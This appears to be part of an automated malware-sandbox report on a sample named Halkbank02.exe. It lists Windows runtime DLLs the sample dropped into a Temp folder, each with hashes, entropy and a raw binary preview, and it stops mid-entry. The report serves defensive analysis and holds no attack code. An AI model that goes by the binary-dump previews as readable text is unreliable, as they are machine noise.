                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18744
                                                                              Entropy (8bit):7.1156948849491055
                                                                              Encrypted:false
                                                                              SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                                                                              MD5:D0289835D97D103BAD0DD7B9637538A1
                                                                              SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                                                                              SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                                                                              SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):17712
                                                                              Entropy (8bit):7.187691342157284
                                                                              Encrypted:false
                                                                              SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                                                                              MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                                                                              SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                                                                              SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                                                                              SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):17720
                                                                              Entropy (8bit):7.19694878324007
                                                                              Encrypted:false
                                                                              SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                                                                              MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                                                                              SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                                                                              SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                                                                              SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18232
                                                                              Entropy (8bit):7.137724132900032
                                                                              Encrypted:false
                                                                              SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                                                                              MD5:12CC7D8017023EF04EBDD28EF9558305
                                                                              SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                                                                              SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                                                                              SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):20280
                                                                              Entropy (8bit):7.04640581473745
                                                                              Encrypted:false
                                                                              SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                                                                              MD5:71AF7ED2A72267AAAD8564524903CFF6
                                                                              SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                                                                              SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                                                                              SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18744
                                                                              Entropy (8bit):7.138910839042951
                                                                              Encrypted:false
                                                                              SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                                                                              MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                                                                              SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                                                                              SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                                                                              SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...X*uY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....X*uY........9...T...T.......X*uY........d...............X*uY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...|...............H...................A.....................................api-ms-win-core-synch-
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):19248
                                                                              Entropy (8bit):7.072555805949365
                                                                              Encrypted:false
                                                                              SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                                                                              MD5:19A40AF040BD7ADD901AA967600259D9
                                                                              SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                                                                              SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                                                                              SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18224
                                                                              Entropy (8bit):7.17450177544266
                                                                              Encrypted:false
                                                                              SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                                                                              MD5:BABF80608FD68A09656871EC8597296C
                                                                              SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                                                                              SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                                                                              SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18232
                                                                              Entropy (8bit):7.1007227686954275
                                                                              Encrypted:false
                                                                              SSDEEP:192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
                                                                              MD5:0F079489ABD2B16751CEB7447512A70D
                                                                              SHA1:679DD712ED1C46FBD9BC8615598DA585D94D5D87
                                                                              SHA-256:F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
                                                                              SHA-512:92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):19256
                                                                              Entropy (8bit):7.088693688879585
                                                                              Encrypted:false
                                                                              SSDEEP:384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
                                                                              MD5:6EA692F862BDEB446E649E4B2893E36F
                                                                              SHA1:84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
                                                                              SHA-256:9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
                                                                              SHA-512:9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):22328
                                                                              Entropy (8bit):6.929204936143068
                                                                              Encrypted:false
                                                                              SSDEEP:384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
                                                                              MD5:72E28C902CD947F9A3425B19AC5A64BD
                                                                              SHA1:9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
                                                                              SHA-256:3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
                                                                              SHA-512:58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18736
                                                                              Entropy (8bit):7.078409479204304
                                                                              Encrypted:false
                                                                              SSDEEP:192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
                                                                              MD5:AC290DAD7CB4CA2D93516580452EDA1C
                                                                              SHA1:FA949453557D0049D723F9615E4F390010520EDA
                                                                              SHA-256:C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
                                                                              SHA-512:B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):20280
                                                                              Entropy (8bit):7.085387497246545
                                                                              Encrypted:false
                                                                              SSDEEP:384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
                                                                              MD5:AEC2268601470050E62CB8066DD41A59
                                                                              SHA1:363ED259905442C4E3B89901BFD8A43B96BF25E4
                                                                              SHA-256:7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
                                                                              SHA-512:0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):19256
                                                                              Entropy (8bit):7.060393359865728
                                                                              Encrypted:false
                                                                              SSDEEP:192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
                                                                              MD5:93D3DA06BF894F4FA21007BEE06B5E7D
                                                                              SHA1:1E47230A7EBCFAF643087A1929A385E0D554AD15
                                                                              SHA-256:F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
                                                                              SHA-512:72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18744
                                                                              Entropy (8bit):7.13172731865352
                                                                              Encrypted:false
                                                                              SSDEEP:192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
                                                                              MD5:A2F2258C32E3BA9ABF9E9E38EF7DA8C9
                                                                              SHA1:116846CA871114B7C54148AB2D968F364DA6142F
                                                                              SHA-256:565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
                                                                              SHA-512:E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................|..O........9...d...d.......|..O........d...............|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):28984
                                                                              Entropy (8bit):6.6686462438397
                                                                              Encrypted:false
                                                                              SSDEEP:384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
                                                                              MD5:8B0BA750E7B15300482CE6C961A932F0
                                                                              SHA1:71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
                                                                              SHA-256:BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
                                                                              SHA-512:FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):26424
                                                                              Entropy (8bit):6.712286643697659
                                                                              Encrypted:false
                                                                              SSDEEP:384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
                                                                              MD5:35FC66BD813D0F126883E695664E7B83
                                                                              SHA1:2FD63C18CC5DC4DEFC7EA82F421050E668F68548
                                                                              SHA-256:66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
                                                                              SHA-512:65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):73016
                                                                              Entropy (8bit):5.838702055399663
                                                                              Encrypted:false
                                                                              SSDEEP:1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
                                                                              MD5:9910A1BFDC41C5B39F6AF37F0A22AACD
                                                                              SHA1:47FA76778556F34A5E7910C816C78835109E4050
                                                                              SHA-256:65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
                                                                              SHA-512:A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):19256
